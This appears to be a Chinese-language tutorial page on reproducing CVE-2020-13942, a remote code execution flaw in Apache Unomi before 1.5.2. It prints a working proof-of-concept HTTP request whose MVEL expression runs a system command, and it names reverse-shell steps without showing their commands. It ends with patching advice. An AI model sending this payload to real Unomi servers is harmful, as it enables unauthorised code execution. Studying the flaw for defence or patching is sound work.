您好,登錄后才能下訂單哦!
Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。
CVE -2020-13942 (Apache Unomi 遠程代碼執行漏洞)
Apache Unomi是一個Java開源平臺,這是一個Java服務器,旨在管理,潛在顧客和訪問者的數據,并幫助個性化體驗。Unomi可用于在非常不同的系統(例如CMS,CRM,問題跟蹤器,本機移動應用程序等)中集成個性化和配置文件管理。
在Apache Unomi 1.5.1版本之前,攻擊者可以通過精心構造的MVEL或ONGl表達式來發送惡意請求,使得Unomi服務器執行任意代碼,漏洞對應編號為CVE-2020-11975,而CVE-2020-13942漏洞是對CVE-2020-11975漏洞的補丁繞過,攻擊者繞過補丁檢測的黑名單,發送惡意請求,在服務器執行任意代碼。
Apache Unomi < 1.5.2
訪問頁面樣式
POC:
POST/context.jsonHTTP/1.1Host: localhost:8181User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0Content-Length: 486{"filters": [ {"id":"boom","filters": [ {"condition": {"parameterValues": {"":"script::Runtime r = Runtime.getRuntime(); r.exec(\"gnome-calculator\");" },"type":"profilePropertyCondition" } } ] } ],"sessionId":"boom"}
抓包poc執行:
查看DNSlog記錄:
嘗試反彈shell:
執行反彈shell命令腳本:
獲取shell
1、盡可能避免將用戶數據放入表達式解釋器中。
2、目前廠商已發布最新版本,請受影響用戶及時下載并更新至最新版本。官方鏈接如下:
看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。